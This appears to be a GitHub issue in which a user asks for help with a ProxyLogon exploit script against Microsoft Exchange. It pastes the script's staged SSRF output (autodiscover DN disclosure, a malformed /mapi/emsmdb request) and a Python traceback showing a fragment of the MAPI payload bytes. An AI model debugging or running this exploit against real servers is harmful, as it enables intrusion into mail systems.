-
Notifications
You must be signed in to change notification settings - Fork 9
Description
Hey Buddy,
what do i wrong?
[Stage 0] Fetch Exchange FQDN from mail.test.local
[Stage 0] Fetched FQDN Successfully: MAIL
[Stage 1] Performing SSRF attack on endpoint /autodiscover/autodiscover.xml against mail.test.local
[Stage 1] Successfully obtained DN: /o=test/ou=Exchange Administrative Group (FYDIBOH3425HLT)/cn=Recipients/cn=27f8454fa3d547c0a84ikjb823a1e83db-info
[Stage 2] Performing malformed SSRF attack to obtain Security ID (SID) using endpoint /mapi/emsmdb against mail.test.local
Traceback (most recent call last):
File "ProxyLogon.py", line 338, in
main()
File "ProxyLogon.py", line 328, in main
sid = exploit_stage2(target, email, user_agent, random_name, legacyDn, FQDN)
File "ProxyLogon.py", line 91, in exploit_stage2
mapi_body = legacyDn + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 5: ordinal not in range(128)